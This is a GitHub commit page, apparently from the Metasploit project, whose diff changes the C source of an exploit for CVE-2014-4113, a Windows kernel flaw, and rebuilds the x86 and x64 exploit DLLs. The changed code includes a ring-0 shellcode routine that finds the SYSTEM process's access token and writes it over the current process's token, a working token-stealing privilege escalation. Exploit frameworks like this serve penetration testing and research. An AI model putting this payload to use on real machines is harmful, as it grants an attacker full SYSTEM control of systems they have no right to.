Skip to content

Commit 8e547e2

Browse files
jvazquez-r7jvazquez-r7
committed
Use correct types
1 parent cd16ee8 commit 8e547e2

File tree

3 files changed

+29
-19
lines changed

3 files changed

+29
-19
lines changed

data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll

0 Bytes
Binary file not shown.

data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll

0 Bytes
Binary file not shown.

external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c

Lines changed: 29 additions & 19 deletions
Original file line numberDiff line numberDiff line change
@@ -24,6 +24,15 @@ typedef NTSTATUS *PNTSTATUS;
2424

2525
#define PTR_SIZE sizeof(UINT_PTR)
2626

27+
28+
#ifdef _M_X64
29+
typedef DWORD64 MYWORD;
30+
typedef PDWORD64 PMYWORD;
31+
#else
32+
typedef DWORD MYWORD;
33+
typedef PDWORD PMYWORD;
34+
#endif
35+
2736
typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
2837
IN HANDLE ProcessHandle,
2938
IN PVOID *BaseAddress,
@@ -137,27 +146,28 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
137146

138147

139148
// Search the specified data structure for a member with CurrentValue.
140-
BOOL find_and_replace_member(PDWORD pdwStructure, DWORD dwCurrentValue, DWORD dwNewValue, DWORD dwMaxSize)
149+
BOOL find_and_replace_member(PMYWORD Structure,
150+
MYWORD CurrentValue,
151+
MYWORD NewValue,
152+
MYWORD MaxSize)
141153
{
142-
DWORD dwIndex, dwMask;
154+
MYWORD i, Mask;
143155

144156
// Microsoft QWORD aligns object pointers, then uses the lower three
145157
// bits for quick reference counting.
146158
#ifdef _M_X64
147-
dwMask = ~0xf;
159+
Mask = ~0xf;
148160
#else
149-
dwMask = ~7;
161+
Mask = ~7;
150162
#endif
151-
// dwMask out the reference count.
152-
dwCurrentValue &= dwMask;
163+
// Mask out the reference count.
164+
CurrentValue &= Mask;
153165

154-
// Scan the structure for any occurrence of dwCurrentValue.
155-
for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++)
156-
{
157-
if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue)
158-
{
166+
// Scan the structure for any occurrence of CurrentValue.
167+
for (i = 0; i < MaxSize; i++) {
168+
if ((Structure[i] & Mask) == CurrentValue) {
159169
// And finally, replace it with NewValue.
160-
pdwStructure[dwIndex] = dwNewValue;
170+
Structure[i] = NewValue;
161171
return TRUE;
162172
}
163173
}
@@ -170,19 +180,19 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
170180
{
171181
void *pMyProcessInfo = NULL;
172182
void *pSystemInfo = NULL;
173-
PACCESS_TOKEN systemToken;
174-
PACCESS_TOKEN targetToken;
183+
PACCESS_TOKEN SystemToken;
184+
PACCESS_TOKEN TargetToken;
175185

176186
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
177187
pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
178188

179-
targetToken = pPsReferencePrimaryToken(pMyProcessInfo);
180-
systemToken = pPsReferencePrimaryToken(pSystemInfo);
189+
TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
190+
SystemToken = pPsReferencePrimaryToken(pSystemInfo);
181191

182192
// Find the token in the target process, and replace with the system token.
183-
find_and_replace_member((PDWORD)pMyProcessInfo,
184-
(DWORD)targetToken,
185-
(DWORD)systemToken,
193+
find_and_replace_member((PMYWORD)pMyProcessInfo,
194+
(MYWORD)TargetToken,
195+
(MYWORD)SystemToken,
186196
0x200);
187197
return 0;
188198
}

0 commit comments

Comments
 (0)